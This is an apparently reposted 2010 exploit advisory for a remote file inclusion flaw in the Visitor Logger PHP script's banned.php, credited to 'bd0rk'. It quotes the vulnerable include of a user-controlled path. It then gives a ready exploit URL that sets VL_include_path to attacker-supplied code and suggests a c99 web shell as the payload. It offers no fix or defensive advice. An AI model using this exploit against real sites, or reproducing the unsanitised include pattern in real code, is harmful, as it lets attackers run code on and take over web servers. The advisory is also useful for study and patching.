Home / os / win7

Visitor Logger (banned.php) Remote File Include Vulnerabilit

Posted on 31 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Visitor Logger (banned.php) Remote File Include Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================
Visitor Logger (banned.php) Remote File Include Vulnerability
=============================================================


#-&gt; Visitor Logger (banned.php) Remote File Include Vulnerability
 
#-&gt; Date: 2010/05/31
 
#-&gt; Vendor: http://www.graviton-mediatech.com
 
#-&gt; Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip
 
#-&gt; Googledork: n/a
 
#-&gt; Discovered by bd0rk
 
#-&gt; Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com
 
#-&gt; Website: www.soh-crew.it.tt
 
#-&gt; Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)
 
-------------------------------------------------------------------------------
 
Description 1: Look in file banned.php line three to four and you can see this
 
if (file_exists($VL_include_path.&quot;/banned.txt&quot;)) {
    include($VL_include_path.&quot;/banned.txt&quot;);
 
-------------------------------------------------------------------------------
 
[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]
 
 
--&gt; An attacker can use c99-shellcode, for example.
 
 
#### The 21 years old, german Hacker bd0rk ####


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-31]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :